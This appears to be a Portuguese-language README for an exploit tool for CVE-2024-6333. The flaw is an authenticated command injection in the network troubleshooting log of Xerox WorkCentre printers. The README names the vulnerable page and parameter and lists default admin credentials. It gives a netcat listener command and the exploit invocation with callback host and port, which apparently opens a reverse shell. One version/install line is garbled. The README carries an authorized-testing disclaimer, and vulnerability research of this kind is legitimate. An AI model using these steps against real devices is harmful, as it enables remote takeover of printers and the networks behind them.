
Vulnerabilidade de execução remota de código autenticada em impressoras Xerox WorkCentre por meio do recurso de log de solução de problemas de rede.
Vulnerabilidade de execução remota de código autenticada em impressoras Xerox WorkCentre por meio do recurso de Log de Solução de Problemas de Rede.
A funcionalidade de Log de Solução de Problemas de Rede (/properties/security/network_troubleshooting_log.php) não sanitiza o parâmetro do servidor de destino (security.nwtroubleshoot.destination.server), permitindo que um administrador autenticado injete comandos arbitrários do sistema operacional. Quando a captura do log de rede é iniciada, o payload injetado é executado como um comando shell, resultando em execução remota de código.
073.110.019.14200)pip install -r requirements.txt
Inicie um listener na sua máquina:
nc -lvnp 8443
Execute o exploit:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
Esta ferramenta é fornecida apenas para testes de segurança autorizados e fins educacionais. O acesso não autorizado a sistemas de computador é ilegal.
| Argumento | Obrigatório | Padrão | Descrição |
|---|
--target | Sim | URL de destino (ex.: https://192.0.2.1) | |
--lhost | Sim | Endereço IP do listener | |
--lport | Não | 8443 | Porta do listener |
--user | Não | admin | Nome de usuário do administrador |
--password | Não | 1111 | Senha do administrador |
--proxy | Não | URL do proxy (ex.: http://127.0.0.1:8080) |